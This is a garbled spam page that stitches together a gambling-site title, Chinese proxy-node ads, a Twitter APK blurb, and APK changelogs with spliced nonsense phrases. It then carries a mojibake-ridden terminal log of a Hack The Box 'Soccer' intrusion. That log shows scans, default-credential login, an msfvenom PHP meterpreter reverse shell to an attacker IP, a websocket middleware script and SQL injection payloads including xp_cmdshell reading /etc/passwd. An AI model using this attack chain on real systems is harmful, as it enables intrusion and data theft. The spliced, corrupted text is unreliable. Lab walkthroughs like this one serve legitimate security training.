twitter free download apk-威尼斯人2299

付费节点购买	tiktok节点购买
稳定节点机场	安卓/苹果/电脑加速器
小火箭节点加速器	ssr加速器节点
v2ray节点订阅更新	shadowrock节点

join the conversation! twitter is your go-to social networking app and the source for what's happening in the world. from world news to local news, entertainment to sports and gaming, politics to fun stories that go viral, when it happens in the world, it happens on twitter first. find friends or follow influential people - every voice can impact the world! join over 2 billion users worldwide!

tweet, retweet, reply to tweets, share or like - twitter is easy to use

chat privately or go big and initiate a group conversation with anyone who follows you. track your friends & other twitter followers or follow your favorite celebrity alongside hundreds of interesting twitter users, to read their content at a glance. engage your social network with noteworthy links, photos and videos. discover which of your tweets were liked or retweeted.

create your free twitter account today!

twitter allows you to find interesting people or build a following of people who are interested in you. maintaining a social connection has never been easier!twitter allows celebs to build a personal connection with their fans. this is why twitter has become one of the most used social media platforms in the world.

build an engaging profile

customize your profile, add a photo, description, location, and background photo

tweet often and optimize your posting times

post visual content

use hashtags in your tweets

draw in followers outside of twitter

know what鈥檚 trending now

discover top trending hashtags and breaking news headlines. whether you鈥檙e interested in sports highlights, pop culture and entertainment or politics, twitter is your source of information.

live streaming events

join the conversation or watch live videos to deeply engage with large audiences directly from your mobile device. go live, create your own live streaming events, share videos or sit back and watch events from around the world.

terms and conditions: twitter /en/tos

android tuner 0.12.5.1 apk

what's in this android tuner 0.12.5.1 apk

full android 4.4 support (except sms restore)

optimized app manager performance (apps and backups tabs)

xposed framework integrated taxi heathrow for quick installation

2 columns apps/backups on tablets in landscape

shortcut to 鈥?[read more...]

tweetings for twitter 4.0 apk

what's in this tweetings for twitter 4.0 apk

new style drawer navigation, swipe from left edge to right to open drawer, or tap the menu icon at the top left. optionally switch taxi gatwick to london back to prajituri si torturi zalau tab navigation from settings -> look & feel -> navigation 鈥?[read more...]

rocketdial dialer&contacts pro 3.6.5 apk

what's in this rocketdial dialer&contacts pro 3.6.5 apk

added support to android 4.4 platform .

optimized startup speed

optimized memory consumptions.

optimized dialpad gestures, more accurate, no more misoperations.

some bug 鈥?[read more...]

root call blocker pro 2.2.3.6 apk

what's in this root call blocker pro 2.2.3.6 apk

fixed sms issues

fixed issues on 4.3

fixed delivery reports issues

fixed issues from user replies

welcome to root call blocker 2. if you experience any issue, or need advice, write to us through the 鈥?[read more...]

terratime 3.9.5 apk

what's in this terratime 3.9.5 apk

reduce globe's tendency to rotate abruptly under various circumstances

normalize globe auto-rotation speed across different screen sizes

support android 4.4 (kitkat)

fix bug: pinch-to-zoom disable option on globe lwp stopped working 鈥?[read more...]

ram manager pro 5.3.3 apk

what's in this version:

fixed "memory info"

added icon for xxhdpi resolution

some minor changes

options "balance, more free memory, more multitasking, hard gaming and hard multitasking" were improved

application now also controls overcommit memory and 鈥?[read more...]

infinite flight 1.2 apk

what's new

completely reworked in flight user interface

added the boeing 777-300er (paid)

added amsterdam and region as free scenery

added denver and south florida as paid sceneries

reworked a340/330-300 and 330-200f cockpits and added new liveries

added 鈥?[read more...]

annoying orange splatter up! 1.0.3 apk

join the annoying orange and his entourage for this splatterific home run derby game that is sure to put you in stiches. swipe for the fences and induce maximum pain (and points) on unsuspecting fruits like apple, banana and cantaloupe in the kitchen of 鈥?[read more...]

locus map pro 2.17.1 apk

what's in this locus map pro 2.17.1 apk

add:usgs topo maps (also for download)

add: support for dropbox (import/export of files)

add: ability to import multiple files (also pocketqueries) at once

chg: optimized speed of points and tracks on map

chg: completely 鈥?[read more...]

playerpro music player 2.82 apk

what's in this playerpro music player 2.82 apk

updated translations

more bug fixes

this application is an advanced music and video player for android 2.x devices. playerpro features a beautiful, fast and intuitive interface, alongside powerful audio 鈥?[read more...]

app.hackthebox /machines/soccer

鈹屸攢鈹€(kwkl銐縦wkl)-[~]

鈹斺攢$ cat /etc/hosts 1 猕?/p>

127.0.0.1 localhost

127.0.1.1 kwkl.kwkl kwkl

# the following lines are desirable for ipv6 capable hosts

::1 localhost ip6-localhost ip6-loopback

ff02::1 ip6-allnodes

ff02::2 ip6-allrouters

10.129.187.153 unika.htb

10.129.187.172 thetoppers.htb

10.129.187.172 s3.thetoppers.htb

#10.129.235.232 megacorp

10.10.11.196 stocker.htb

10.10.11.196 dev.stocker.htb

10.10.11.194 soccer.htb

鈹屸攢鈹€(kwkl銐縦wkl)-[~/妗岄潰/burp]

鈹斺攢$ nmap -a 10.10.11.194 -t4 130 猕?/p>

starting nmap 7.93 ( nmap.org ) at 2023-03-03 22:46 hkt

nmap scan report for 10.10.11.194 (10.10.11.194)

host is up (0.99s latency).

not shown: 997 closed tcp ports (conn-refused)

port state service version

22/tcp open ssh openssh 8.2p1 ubuntu 4ubuntu0.5 (ubuntu linux; protocol 2.0)

| ssh-hostkey:

| 3072 ad0d84a3fdcc98a478fef94915dae16d (rsa)

| 256 dfd6a39f68269dfc7c6a0c29e961f00c (ecdsa)

|_ 256 5797565def793c2fcbdb35fff17c615c (ed25519)

80/tcp open http nginx 1.18.0 (ubuntu)

|_http-server-header: nginx/1.18.0 (ubuntu)

9091/tcp open xmltec-xmlmail?

| fingerprint-strings:

| informix:

| http/1.1 400 bad request

|_ connection: close

1 service unrecognized despite returning data. if you know the service/version, please submit the following fingerprint at nmap.org/cgi-bin/submit.cgi?new-service :

sf-port9091-tcp:v=7.93%i=7%d=3/3%time=640208c3%p=x86_64-pc-linux-gnu%r(inf

sf:ormix,2f,"http/1\.1\x20400\x20bad\x20request\r\nconnection:\x20close\r\

sf:n\r\n");

service info: os: linux; cpe: cpe:/o:linux:linux_kernel

service detection performed. please report any incorrect results at nmap.org/submit/ .

nmap done: 1 ip address (1 host up) scanned in 255.63 seconds

鈹屸攢鈹€(kwkl銐縦wkl)-[~/妗岄潰/burp]

鈹屸攢鈹€(kwkl銐縦wkl)-[~]

鈹斺攢$ gobuster dir -u soccer.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt 1 猕?/p>

===============================================================

gobuster v3.2.0-dev

by oj reeves (@thecolonial) & christian mehlmauer (@firefart)

===============================================================

[ ] url: soccer.htb

[ ] method: get

[ ] threads: 10

[ ] wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

[ ] negative status codes: 404

[ ] user agent: gobuster/3.2.0-dev

[ ] timeout: 10s

===============================================================

2023/03/04 11:51:23 starting gobuster in directory enumeration mode

===============================================================

/tiny (status: 301) [size: 178] [--> soccer.htb/tiny/]

progress: 9478 / 87665 (10.81%)^c

[!] keyboard interrupt detected, terminating.

===============================================================

2023/03/04 12:04:41 finished

===============================================================

search exploit

how to use

download zip with latest version from master branch.

just copy the tinyfilemanager.php to your webspace - thats all 馃槂 you can also change the file name from 鈥渢inyfilemanager.php鈥?to something else, you know what i meant for.

default username/password: admin/admin@123 and user/12345.

鈿狅笍 warning: please set your own username and password in $auth_users before use. password is encrypted with password_hash(). to generate new password hash here

to enable/disable authentication set $use_auth to true or false.

鈩癸笍 add your own configuration file config.php in the same folder to use as additional configuration file.

鈩癸笍 to work offline without cdn resources, use offline branch

try username password

try user/12345.

try admin/admin@123

tiny file manager 2.4.3

have upload file privilege

search exploit锛?/p>

generous the horse

鈹屸攢鈹€(kwkl銐縦wkl)-[~/hodl/htb/soccer]

鈹斺攢$ cat ~/shell.php 1 猕?/p>

鈹屸攢鈹€(kwkl銐縦wkl)-[~/hodl/htb/soccer]

鈹斺攢$ msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.16.9 lport=5555 -o shell.php

鈹€鈹€(kwkl銐縦wkl)-[~]

鈹斺攢$ msfconsole

___ ____

,-"" `. < honk >

,' _ e )`-._ / ----

/ ,' `-._<.===-'

/ /

/ ;

_ / ;

(`._ _.-"" ""--..__,' |

<_ `-"" \

<`- :

(__ <__. ;

`-. '-.__. _.' /

\ `-.__,-' _,'

`._ , /__,-'

""._\__,'< <____

| | `----.`.

| | \ `.

; |___ \-``

\ --<

`.`.<

`-'

=[ metasploit v6.2.26-dev ]

-- --=[ 2265 exploits - 1189 auxiliary - 404 post ]

-- --=[ 951 payloads - 45 encoders - 11 nops ]

-- --=[ 9 evasion ]

metasploit tip: view advanced module options with

advanced

metasploit documentation: docs.metasploit /

msf6 > search handler

matching modules

================

# name disclosure date rank check description

- ---- --------------- ---- ----- -----------

0 exploit/windows/ftp/aasync_list_reply 2010-10-12 good no aasync v2.2.1.0 (win32) stack buffer overflow (list)

1 exploit/linux/local/abrt_raceabrt_priv_esc 2015-04-14 excellent yes abrt raceabrt privilege escalation

2 exploit/linux/local/abrt_sosreport_priv_esc 2015-11-23 excellent yes abrt sosreport privilege escalation

3 exploit/windows/misc/cve_2022_28381_allmediaserver_bof 2022-04-01 good no allmediaserver 1.6 seh buffer overflow

4 exploit/windows/browser/aim_goaway 2004-08-09 great no aol instant messenger goaway overflow

5 exploit/linux/local/apt_package_manager_persistence 1999-03-09 excellent no apt package manager persistence

6 exploit/linux/http/accellion_fta_getstatus_oauth 2015-07-10 excellent yes accellion fta getstatus verify_oauth_token command execution

7 exploit/windows/misc/achat_bof 2014-12-18 normal no achat unicode seh buffer overflow

8 exploit/android/local/janus 2017-07-31 manual yes android janus apk signature bypass

9 auxiliary/scanner/http/apache_activemq_traversal normal no apache activemq directory traversal

10 auxiliary/scanner/http/apache_activemq_source_disclosure normal no apache activemq jsp files source disclosure

11 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal yes apache mod_cgi bash environment variable injection (shellshock) scanner

12 exploit/linux/local/apport_abrt_chroot_priv_esc 2015-03-31 excellent yes apport / abrt chroot privilege escalation

13 exploit/windows/local/ps_wmi_exec 2012-08-19 excellent no authenticated wmi exec via powershell

14 exploit/windows/http/bea_weblogic_transfer_encoding 2008-09-09 great no bea weblogic transfer-encoding buffer overflow

15 exploit/linux/local/bash_profile_persistence 1989-06-08 normal no bash profile persistence

16 exploit/freebsd/misc/citrix_netscaler_soap_bof 2014-09-22 normal yes citrix netscaler soap handler remote code execution

17 exploit/windows/misc/stream_down_bof 2011-12-27 good no cocsoft streamdown 6.8.0 buffer overflow

18 exploit/windows/fileformat/cyberlink_lpp_bof 2017-09-23 normal no cyberlink labelprint 2.5 stack buffer overflow

19 exploit/windows/fileformat/cyberlink_p2g_bof 2011-09-12 great no cyberlink power2go name attribute (p2g) stack buffer overflow exploit

20 exploit/linux/http/dlink_hnap_bof 2014-05-15 normal yes d-link hnap request remote buffer overflow

21 exploit/linux/http/dlink_dspw215_info_cgi_bof 2014-05-22 normal yes d-link info.cgi post request buffer overflow

22 exploit/linux/local/desktop_privilege_escalation 2014-08-07 excellent yes desktop linux password stealer and privilege escalation

23 exploit/windows/browser/exodus 2018-01-25 manual no exodus wallet (electronjs framework) remote code execution

24 exploit/windows/ftp/ftpsynch_list_reply 2010-10-12 good no ftp synchronizer professional 4.0.73.274 stack buffer overflow

25 exploit/windows/ftp/ftpgetter_pwd_reply 2010-10-12 good no ftpgetter standard v3.55.0.05 stack buffer overflow (pwd)

26 exploit/windows/ftp/ftpshell51_pwd_reply 2010-10-12 good no ftpshell 5.1 stack buffer overflow

27 exploit/windows/fileformat/foxit_title_bof 2010-11-13 great no foxit pdf reader v4.1.1 title stack buffer overflow

28 exploit/freebsd/telnet/telnet_encrypt_keyid 2011-12-23 great no freebsd telnet service encryption key id buffer overflow

29 exploit/windows/ftp/gekkomgr_list_reply 2010-10-12 good no gekko manager ftp client stack buffer overflow

30 exploit/multi/handler manual no generic payload handler

31 exploit/windows/misc/hp_dataprotector_new_folder 2012-03-12 normal no hp data protector create new folder buffer overflow

32 exploit/multi/http/hp_sitescope_uploadfileshandler 2012-08-29 good no hp sitescope remote code execution

33 exploit/windows/browser/notes_handler_cmdinject 2012-06-18 excellent no ibm lotus notes client url handler command injection

34 auxiliary/dos/misc/ibm_tsm_dos 2015-12-15 normal no ibm tivoli storage manager fastback server opcode 0x534 denial of service

35 exploit/windows/firewall/blackice_pam_icq 2004-03-18 great no iss pam.dll icq parser buffer overflow

36 exploit/linux/telnet/telnet_encrypt_keyid 2011-12-23 great no linux bsd-derived telnet service encryption key id buffer overflow

37 exploit/windows/iis/ms01_033_idq 2001-06-18 good no ms01-033 microsoft iis 5.0 idq path overflow

38 exploit/windows/browser/ms05_054_onload 2005-11-21 normal no ms05-054 microsoft internet explorer javascript onload handler remote code execution

39 exploit/windows/browser/ms13_055_canchor 2013-07-09 normal no ms13-055 microsoft internet explorer canchorelement use-after-free

40 exploit/windows/browser/ms13_059_cflatmarkuppointer 2013-06-27 normal no ms13-059 microsoft internet explorer cflatmarkuppointer use-after-free

41 exploit/windows/browser/ms13_069_caret 2013-09-10 normal no ms13-069 microsoft internet explorer ccaret use-after-free

42 exploit/windows/browser/ms13_080_cdisplaypointer 2013-10-08 normal no ms13-080 microsoft internet explorer cdisplaypointer use-after-free

43 exploit/windows/browser/ie_setmousecapture_uaf 2013-09-17 normal no ms13-080 microsoft internet explorer setmousecapture use-after-free

44 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent no ms14-060 microsoft windows ole package manager code execution

45 exploit/windows/fileformat/magix_musikmaker_16_mmm 2011-04-26 good no magix musik maker 16 .mmm stack buffer overflow

46 auxiliary/gather/eventlog_cred_disclosure 2014-11-05 normal no manageengine eventlog analyzer managed hosts administrator credential disclosure

47 exploit/multi/http/maracms_upload_exec 2020-08-31 excellent yes maracms arbitrary php file upload

48 exploit/unix/webapp/guestbook_ssi_exec 1999-11-05 excellent no matt wright guestbook.pl arbitrary command execution

49 auxiliary/dos/http/metasploit_httphandler_dos 2019-09-04 normal no metasploit http(s) handler dos

50 exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent no microsoft help center xss and command execution

51 exploit/windows/fileformat/office_word_hta 2017-04-14 excellent no microsoft office word malicious hta execution

52 exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great no microsoft sql server database link crawling command execution

53 exploit/linux/http/netgear_readynas_exec 2013-07-12 manual yes netgear readynas perl code evaluation

54 auxiliary/server/dns/native_server normal no native dns server (example)

55 exploit/windows/fileformat/nuance_pdf_launch_overflow 2010-10-08 great no nuance pdf reader v6.0 launch stack buffer overflow

56 exploit/windows/ftp/odin_list_reply 2010-10-12 good no odin secure ftp 4.1 stack buffer overflow (list)

57 exploit/windows/browser/persits_xupload_traversal 2009-09-29 excellent no persits xupload activex makehttprequest directory traversal

58 exploit/windows/http/integard_password_bof 2010-09-07 great no race river integard home/pro loginadmin password stack buffer overflow

59 exploit/linux/http/raidsonic_nas_ib5220_exec_noauth 2013-02-04 manual no raidsonic nas devices unauthenticated remote command execution

60 exploit/windows/local/razer_zwopenprocess 2017-03-22 normal yes razer synapse rzpnk.sys zwopenprocess

61 exploit/linux/http/rconfig_ajaxarchivefiles_rce 2020-03-11 good yes rconfig 3.x chained remote code execution

62 auxiliary/dos/http/webrick_regex 2008-08-08 normal no ruby webrick::http::defaultfilehandler dos

63 exploit/osx/browser/safari_user_assisted_download_launch 2014-03-10 manual no safari user-assisted download and run attack

64 exploit/android/browser/samsung_knox_smdm_url 2014-11-12 excellent no samsung galaxy knox android browser rce

65 exploit/windows/ftp/scriptftp_list 2011-10-12 good no scriptftp list remote buffer overflow

66 exploit/windows/ftp/seagull_list_reply 2010-10-12 good no seagull ftp v3.3 build 409 stack buffer overflow

67 exploit/windows/http/sitecore_xp_cve_2021_42237 2021-11-02 excellent yes sitecore experience platform (xp) preauth deserialization rce

68 auxiliary/dos/http/squid_range_dos 2021-05-27 normal no squid proxy range header dos

69 auxiliary/server/teamviewer_uri_smb_redirect normal no teamviewer unquoted uri handler smb redirect

70 exploit/linux/http/trendmicro_websecurity_exec 2020-06-10 excellent yes trend micro web security (virtual appliance) remote code execution

71 exploit/windows/misc/trendmicro_cmdprocessor_addtask 2011-12-07 good no trendmicro control manger cmdprocessor.exe stack buffer overflow

72 exploit/windows/http/ultraminihttp_bof 2013-07-10 normal no ultra mini httpd stack buffer overflow

73 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent yes windows escalate uac protection bypass (via com handler hijack)

74 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent yes windows uac protection bypass (via slui file handler hijack)

75 exploit/multi/http/wp_ait_csv_rce 2020-11-14 excellent yes wordpress ait csv import export unauthenticated remote code execution

76 exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload 2014-11-11 excellent yes wordpress photo gallery unrestricted file upload

77 auxiliary/admin/http/wp_gdpr_compliance_privesc 2018-11-08 normal yes wordpress wp gdpr compliance plugin privilege escalation

78 exploit/windows/fileformat/xion_m3u_sehbof 2010-11-23 great no xion audio player 1.0.126 unicode stack buffer overflow

79 exploit/linux/local/yum_package_manager_persistence 2003-12-17 excellent no yum package manager persistence

80 exploit/windows/fileformat/zahir_enterprise_plus_csv 2018-09-28 normal no zahir enterprise plus 6 stack buffer overflow

81 exploit/linux/http/zyxel_ztp_rce 2022-04-28 excellent yes zyxel firewall ztp unauthenticated command injection

82 exploit/unix/webapp/jquery_file_upload 2018-10-09 excellent yes blueimp's jquery (arbitrary) file upload

83 exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc 2015-12-18 excellent yes blueman set_dhcp_handler d-bus privilege escalation

interact with a module by name or index. for example info 83, use 83 or use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc

msf6 > use exploit/multi/handler

[*] using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload php/

set payload php/bind_perl set payload php/exec set payload php/meterpreter/reverse_tcp

set payload php/bind_perl_ipv6 set payload php/meterpreter/bind_tcp set payload php/meterpreter/reverse_tcp_uuid

set payload php/bind_php set payload php/meterpreter/bind_tcp_ipv6 set payload php/meterpreter_reverse_tcp

set payload php/bind_php_ipv6 set payload php/meterpreter/bind_tcp_ipv6_uuid set payload php/reverse_perl

set payload php/download_exec set payload php/meterpreter/bind_tcp_uuid set payload php/reverse_php

msf6 exploit(multi/handler) > set payload php/meterpreter/

set payload php/meterpreter/bind_tcp set payload php/meterpreter/bind_tcp_ipv6_uuid set payload php/meterpreter/reverse_tcp

set payload php/meterpreter/bind_tcp_ipv6 set payload php/meterpreter/bind_tcp_uuid set payload php/meterpreter/reverse_tcp_uuid

msf6 exploit(multi/handler) > set payload php/meterpreter/

set payload php/meterpreter/bind_tcp set payload php/meterpreter/bind_tcp_ipv6_uuid set payload php/meterpreter/reverse_tcp

set payload php/meterpreter/bind_tcp_ipv6 set payload php/meterpreter/bind_tcp_uuid set payload php/meterpreter/reverse_tcp_uuid

msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

payload => php/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 10.10.16.9

lhost => 10.10.16.9

msf6 exploit(multi/handler) > set lport 5555

lport => 5555

msf6 exploit(multi/handler) > ls

[*] exec: ls

allowed.userlist cookies google-chrome-stable_current_amd64.deb logs raw-md5 transportsecurity 鍏叡

allowed.userlist.passwd cookies-journal gpucache machineid respondehash1.txt user 鍦栫墖

backups crashpad hash.txt module13 respondehash.txt vaccinhash.txt 褰辩墖

blob_storage ctf4 hasixulc.html msf 'service worker' vpy3.9 鏂囦欢

cache ctf8 hodl 'network persistent state' 'session storage' vulhub 妗岄潰

cacheddata databases jndi-injection-exploit-plus-1.8-snapshot-all.jar paused.conf shell.php webstorage 妯℃澘

cachedextensions dictionaries languagepacks.json preferences shell.sh worknotes.txt 闊虫▊

'code cache' flag.txt 'local storage' prod.dtsconfig solve_pow.py 涓嬭浇

msf6 exploit(multi/handler) > show options

module options (exploit/multi/handler):

name current setting required description

---- --------------- -------- -----------

payload options (php/meterpreter/reverse_tcp):

name current setting required description

---- --------------- -------- -----------

lhost 10.10.16.9 yes the listen address (an interface may be specified)

lport 5555 yes the listen port

exploit target:

id name

-- ----

0 wildcard target

view the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run

[*] started reverse tcp handler on 10.10.16.9:5555

[*] sending stage (39927 bytes) to 10.10.11.194

[*] meterpreter session 1 opened (10.10.16.9:5555 -> 10.10.11.194:52842) at 2023-03-05 11:12:21 0800

meterpreter > sysinfo

computer : soccer

os : linux soccer 5.4.0-135-generic #152-ubuntu smp wed nov 23 20:19:22 utc 2022 x86_64

meterpreter : php/linux

meterpreter > id

[-] unknown command: id

meterpreter > id

[-] unknown command: id

meterpreter > os-shell

[-] unknown command: os-shell

meterpreter > ?

core commands

=============

command description

------- -----------

? help menu

background backgrounds the current session

bg alias for background

bgkill kills a background meterpreter script

bglist lists running background scripts

bgrun executes a meterpreter script as a background thread

channel displays information or control active channels

close closes a channel

detach detach the meterpreter session (for http/https)

disable_unicode_encoding disables encoding of unicode strings

enable_unicode_encoding enables encoding of unicode strings

exit terminate the meterpreter session

guid get the session guid

help help menu

info displays information about a post module

irb open an interactive ruby shell on the current session

load load one or more meterpreter extensions

machine_id get the msf id of the machine attached to the session

pry open the pry debugger on the current session

quit terminate the meterpreter session

read reads data from a channel

resource run the commands stored in a file

run executes a meterpreter script or post module

secure (re)negotiate tlv packet encryption on the session

sessions quickly switch to another session

use deprecated alias for "load"

uuid get the uuid for the current session

write writes data to a channel

stdapi: file system commands

============================

command description

------- -----------

cat read the contents of a file to the screen

cd change directory

checksum retrieve the checksum of a file

chmod change the permissions of a file

cp copy source to destination

del delete the specified file

dir list files (alias for ls)

download download a file or directory

edit edit a file

getlwd print local working directory

getwd print working directory

lcat read the contents of a local file to the screen

lcd change local working directory

lls list local files

lpwd print local working directory

ls list files

mkdir make directory

mv move source to destination

pwd print working directory

rm delete the specified file

rmdir remove directory

search search for files

upload upload a file or directory

stdapi: networking commands

===========================

command description

------- -----------

portfwd forward a local port to a remote service

resolve resolve a set of host names on the target

stdapi: system commands

=======================

command description

------- -----------

execute execute a command

getenv get one or more environment variable values

getpid get the current process identifier

getuid get the user that the server is running as

kill terminate a process

localtime displays the target system local date and time

pgrep filter processes by name

pkill terminate processes by name

ps list running processes

shell drop into a system command shell

sysinfo gets information about the remote system, such as os

stdapi: audio output commands

=============================

command description

------- -----------

play play a waveform audio file (.wav) on the target system

meterpreter > shell

process 1689 created.

channel 0 created.

uid=33(www-data) gid=33(www-data) groups=33(www-data)

shell.php

ss -lntup

netid state recv-q send-q local address:port peer address:port process

udp unconn 0 0 127.0.0.53%lo:53 0.0.0.0:*

udp unconn 0 0 0.0.0.0:68 0.0.0.0:*

tcp listen 0 151 127.0.0.1:3306 0.0.0.0:*

tcp listen 0 511 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=1127,fd=6),("nginx",pid=1126,fd=6))

tcp listen 0 4096 127.0.0.53%lo:53 0.0.0.0:*

tcp listen 0 128 0.0.0.0:22 0.0.0.0:*

tcp listen 0 511 127.0.0.1:3000 0.0.0.0:*

tcp listen 0 511 0.0.0.0:9091 0.0.0.0:*

tcp listen 0 70 127.0.0.1:33060 0.0.0.0:*

tcp listen 0 511 [::]:80 [::]:* users:(("nginx",pid=1127,fd=7),("nginx",pid=1126,fd=7))

tcp listen 0 128 [::]:22 [::]:*

cat /etc/nginx.conf

cat: /etc/nginx.conf: no such file or directory

cat /etc/hosts

127.0.0.1 localhost soccer soccer.htb soc-player.soccer.htb

127.0.1.1 ubuntu-focal ubuntu-focal

find / -type d -name dstat 2>/dev/null

/usr/share/doc/dstat

/usr/share/dstat

/usr/local/share/dstat

uid=33(www-data) gid=33(www-data) groups=33(www-data)

cd /usr/local/share/dstat

/bin/sh: 10: cd: can't cd to /usr/local/share/dstat

uid=33(www-data) gid=33(www-data) groups=33(www-data)

pwd

terminate channel 0? [y/n] n

pwd

terminate channel 0? [y/n] n

find soc-player.soccer.htb

[sudo] kwkl 鐨勫瘑鐮侊細

鈹屸攢鈹€(kwkl銐縦wkl)-[~]

鈹斺攢$ cat /etc/hosts

127.0.0.1 localhost

127.0.1.1 kwkl.kwkl kwkl

# the following lines are desirable for ipv6 capable hosts

::1 localhost ip6-localhost ip6-loopback

ff02::1 ip6-allnodes

ff02::2 ip6-allrouters

10.129.187.153 unika.htb

10.129.187.172 thetoppers.htb

10.129.187.172 s3.thetoppers.htb

#10.129.235.232 megacorp

10.10.11.196 stocker.htb

10.10.11.196 dev.stocker.htb

10.10.11.194 soccer.htb

10.10.11.194 soc-player.soccer.htb

try sqlmap

try ws middle ware

鈹屸攢鈹€(kwkl銐縦wkl)-[~/hodl/htb/soccer]

鈹斺攢$ cat ws.py

from http.server import simplehttprequesthandler

from socketserver import tcpserver

from urllib.parse import unquote, urlparse

from websocket import create_connection

ws_server = "ws://soc-player.soccer.htb:9091/"

def send_ws(payload):

ws = create_connection(ws_server)

# if the server returns a response on connect, use below line

#resp = ws.recv() # if server returns something like a token on connect you can find and extract from here

# for our case, format the payload in json

message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking json structure

data = '{"id":"%s"}' % message

ws.send(data)

resp = ws.recv()

ws.close()

if resp:

return resp

else:

return ''

def middleware_server(host_port,content_type="text/plain"):

class customhandler(simplehttprequesthandler):

def do_get(self) -> none:

self.send_response(200)

try:

payload = urlparse(self.path).query.split('=',1)[1]

except indexerror:

payload = false

if payload:

content = send_ws(payload)

else:

content = 'no parameters specified!'

self.send_header("content-type", content_type)

self.end_headers()

self.wfile.write(content.encode())

return

class _tcpserver(tcpserver):

allow_reuse_address = true

httpd = _tcpserver(host_port, customhandler)

httpd.serve_forever()

print("[ ] starting middleware server")

print("[ ] send payloads in localhost:8081/?id=*")

try:

middleware_server(('0.0.0.0',8081))

except keyboardinterrupt:

pass

鈹屸攢鈹€(kwkl銐縦wkl)-[~/hodl/htb/soccer]

鈹斺攢$ python3 ws.py

[ ] starting middleware server

[ ] send payloads in localhost:8081/?id=*

127.0.0.1 - - [05/mar/2023 11:39:06] "get /?id=1 http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:39:09] "get /?id=1&zlto=7210 and 1=1 union all select 1,null,'',table_name from information_schema.tables where 2>1--/**/; exec xp_cmdshell('cat ../../../etc/passwd')# http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:39:15] "get /?id=1 http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:39:26] "get /?id=1,'(),(."), http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:39:31] "get /?id=1'rwowuw<'">ghqxrx http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:39:35] "get /?id=1) and 7838=9274 and (9743=9743 http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:39:40] "get /?id=1 and 7762=3250 http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:39:46] "get /?id=1 and 4911=9784-- ghqf http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:40:02] "get /?id=1') and 4484=4965 and ('rbjr'='rbjr http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:40:06] "get /?id=1' and 3834=5208 and 'vqnp'='vqnp http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:40:10] "get /?id=(select (case when (1185=6285) then 1 else (select 6285 union select 6895) end)) http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:40:15] "get /?id=1) and extractvalue(9909,concat(0x5c,0x716b627a71,(select (elt(9909=9909,1))),0x71716a6a71)) and (6667=6667 http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:40:21] "get /?id=1 and extractvalue(9909,concat(0x5c,0x716b627a71,(select (elt(9909=9909,1))),0x71716a6a71)) http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:40:31] "get /?id=1 and extractvalue(9909,concat(0x5c,0x716b627a71,(select (elt(9909=9909,1))),0x71716a6a71))-- vmol http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:40:36] "get /?id=1') and extractvalue(9909,concat(0x5c,0x716b627a71,(select (elt(9909=9909,1))),0x71716a6a71)) and ('vgzl'='vgzl http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:40:43] "get /?id=1' and extractvalue(9909,concat(0x5c,0x716b627a71,(select (elt(9909=9909,1))),0x71716a6a71)) and 'fmfq'='fmfq http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:40:50] "get /?id=1) and 7941=cast((chr(113)||chr(107)||chr(98)||chr(122)||chr(113))||(select (case when (7941=7941) then 1 else 0 end))::text||(chr(113)||chr(113)||chr(106)||chr(106)||chr(113)) as numeric) and (4381=4381 http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:40:54] "get /?id=1 and 7941=cast((chr(113)||chr(107)||chr(98)||chr(122)||chr(113))||(select (case when (7941=7941) then 1 else 0 end))::text||(chr(113)||chr(113)||chr(106)||chr(106)||chr(113)) as numeric) http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:41:00] "get /?id=1 and 7941=cast((chr(113)||chr(107)||chr(98)||chr(122)||chr(113))||(select (case when (7941=7941) then 1 else 0 end))::text||(chr(113)||chr(113)||chr(106)||chr(106)||chr(113)) as numeric)-- pxhb http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:41:08] "get /?id=1') and 7941=cast((chr(113)||chr(107)||chr(98)||chr(122)||chr(113))||(select (case when (7941=7941) then 1 else 0 end))::text||(chr(113)||chr(113)||chr(106)||chr(106)||chr(113)) as numeric) and ('cjrp'='cjrp http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:41:13] "get /?id=1' and 7941=cast((chr(113)||chr(107)||chr(98)||chr(122)||chr(113))||(select (case when (7941=7941) then 1 else 0 end))::text||(chr(113)||chr(113)||chr(106)||chr(106)||chr(113)) as numeric) and 'jjgq'='jjgq http/1.1" 200 -

